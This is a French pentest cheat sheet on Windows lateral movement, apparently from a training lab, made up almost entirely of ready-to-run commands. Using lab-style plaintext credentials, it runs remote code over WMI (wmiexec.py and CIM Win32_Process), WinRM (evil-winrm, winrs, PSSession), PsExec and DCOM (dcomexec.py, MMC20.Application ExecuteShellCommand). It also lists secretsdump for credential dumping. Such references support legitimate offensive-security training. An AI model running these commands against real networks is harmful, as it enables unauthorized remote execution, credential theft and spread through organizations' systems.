Mouvement latéral

Techniques:

A vérifier une fois sur la machine:

[] Secretsdump
[] NXC sur les protocoles SMB, RDP, MSSQL et WINRM

WMI

wmiexec.py "$DOMAIN"/"$USER":"$PASS"@"$TARGET"

$username = 'jen';
$password = 'Nexus123!';
$secureString = ConvertTo-SecureString $password -AsPlaintext -Force;
$credential = New-Object System.Management.Automation.PSCredential $username, $secureString;
$Options = New-CimSessionOption -Protocol DCOM
$Session = New-Cimsession -ComputerName 192.168.50.73 -Credential $credential -SessionOption $Options
$command = 'calc';
Invoke-CimMethod -CimSession $Session -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine =$Command};

WinRM

evil-winrm -i 192.168.50.73 -u jen -p 'Nexus123!'

winrs -r:192.168.50.73 -u:jen -p:Nexus123!  "cmd /c hostname & whoami"

$username = 'jen';
$password = 'Nexus123!';
$secureString = ConvertTo-SecureString $password -AsPlaintext -Force;
$credential = New-Object System.Management.Automation.PSCredential $username, $secureString;
New-PSSession -ComputerName 192.168.50.73 -Credential $credential

PsExec

# On windows with SysInternals
./PsExec64.exe -i  \\WEB04 -u corp\jen -p Nexus123! cmd
# On linux
psexec.py jen:'Nexus123!'@192.168.164.72

DCOM

Le Component Object Model (COM) permet de créer des composants logiciels qui interagissent entre eux. Ce système a été étendu au Distributed Component Object Model (DCOM) afin que ces composants puissent interagir entre plusieurs postes.

Ce protocole transite par le port TCP/135 et nécessite les droits d’administration local sur la machine ciblée pour contacter le DCOM Service Control Manager.

dcomexec.py "$DOMAIN"/"$USER":"$PASS"@"$TARGET"

$dcom = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application.1","192.168.50.73"))
$dcom.Document.ActiveView.ExecuteShellCommand("cmd",$null,"/c calc","7")